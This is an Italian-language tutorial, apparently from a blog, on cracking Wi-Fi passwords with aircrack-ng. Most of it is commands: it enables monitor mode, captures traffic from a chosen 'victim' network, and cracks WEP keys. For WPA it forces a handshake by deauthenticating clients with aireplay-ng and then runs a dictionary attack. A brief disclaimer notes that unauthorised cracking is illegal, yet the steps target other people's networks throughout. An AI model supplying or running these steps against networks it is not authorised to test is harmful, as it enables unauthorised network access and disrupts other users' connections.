In questa guida vi spiegherò come craccare la password di una rete Wi-Fi utilizzando aircrack-ng e una distribuzione Linux.
Attenzione: prima di cominciare è importante specificare che craccare reti Wi-Fi senza autorizzazione è illegale! Non mi assumo nessuna responsabilità sull’uso che farete di questa guida.
Per cominciare:
Se non avete ancora una distribuzione Linux scaricatene una ed installatela. Troverete una nostra guida qui.
Installate aircrack-ng con questi semplici comandi da terminale:
sudo apt-get updatesudo apt-get install aircrack-ng
Adesso aircrack-ng dovrebbe essere installato e funzionante sul vostro PC.
Sempre da terminale, inserite questo codice:
airmon-ng start wlan0
Questo comando creerà un’interfaccia di monitoraggio collegata alla vostra scheda wireless, permettendo così alla scheda wireless di esaminare tutti i pacchetti che stanno transitando nella vostra area.
Verificate il nome dell’interfaccia appena creata con il comando iwconfig (nel mio caso è wlan0mon).
Adesso potete cominciate a “pescare” i pacchetti con il seguente comando:
airodump-ng <nome interfaccia>
Vi troverete davanti a questa schermata:
Scegliete quale rete “attaccare” e copiatene il relativo BSSID.
Nota: Usate CTRL+C per fermare l’operazione.
Lanciate il seguente comando:
airodump-ng -c <canale (solitamente 11)> --bssid <MAC Address vittima> -w <nome file dump> <nome interfaccia>
Nota: per quanto riguarda il canale, assicuratevi di scegliere lo stesso canale mostrato dal comando airodump-ng <nome interfaccia>.
WEP
Se la rete che stavate attaccando è protetta con crittografia WEP, dopo aver raccolto abbastanza pacchetti, potrete lanciare il comando:
aircrack-ng -b <MAC Address vittima> <nome file dump>.cap
E avrete subito la password che cercate!
WPA
Se invece la crittografia è WPA o WPA2 sarete costretti ad eseguire un “attacco a dizionario”.
Aspettate che il comando airodump-ng -c <canale, solutamente 11> –BSSID <MAC Address vittima> -w <nomefiledump> <nome interfaccia> catturi l’handshake della rete (questo comparirà in alto a destra):
Nota: Se la cattura dell’handshake dovesse richiedere troppo tempo, potrete provare ad accelerarla eseguendo questo comando su un’altra finestra del terminale:
aireplay-ng -0 50 -a <MAC address vittima> -c <MAC address con cui la vittima sta dialogando> <nome interfaccia>
Quando l’handshake sarà stato catturato, interrompete il comando precedente sempre con CTRL+C e lanciate questo:
aircrack-ng -w <nome dizionario> -b <MAC address vittima> <nome file dump>.cap
Aspettate che tutte le password presenti nel dizionario siano testate, questa operazione potrebbe richiedere anche moltissimo tempo e molto probabilmente potrebbe non portare a nulla.
Tutto dipende da quanto completo è il vostro dizionario e quanto potente il vostro PC.
Nota: Potete trovare molti dizionari online più o meno completi, oppure crearne uno voi. In ogni caso, si tratta di semplici file di testo.
Se l’attacco dovesse risultare fruttuoso, vi troverete davanti a questa schermata:
Con questo è tutto!
Alla prossima!
Nota finale: Se non fosse chiaro come i comandi vadano completati ecco un esempio di come dovrebbero apparire, in maniera completa, i comandi 3. e 6.:
airodump-ng -c 11 --bssid XX:XX:XX:XX:XX:XX -w dump wlan0monaircrack-ng -w /home/dizionari/dizionario.txt -b XX:XX:XX:XX:XX:XX dump.cap
Proprio quello che cercavo!